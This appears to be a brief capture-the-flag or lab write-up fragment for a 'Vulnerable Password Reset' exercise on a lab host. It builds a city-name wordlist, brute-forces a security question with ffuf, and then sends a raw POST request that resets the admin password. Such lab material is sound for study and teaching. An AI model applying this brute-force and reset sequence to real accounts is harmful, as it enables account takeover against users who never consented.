Vulnerable Password Reset
cat world-cities.csv | cut -d ',' -f1 > city_wordlist.txt wc -l city_wordlist.txt # Results in 26,468 citiesffuf -w ./city_wordlist.txt -u http://pwreset.htb/security_question.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=39b54j201u3rhu4tab1pvdb4pv" -d "security_response=FUZZ" -fr "Incorrect response."
POST /reset_password.php HTTP/1.1 Host: pwreset.htb Content-Length: 32 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=39b54j201u3rhu4tab1pvdb4pv password=P@$w0rd&username=admin
Last updated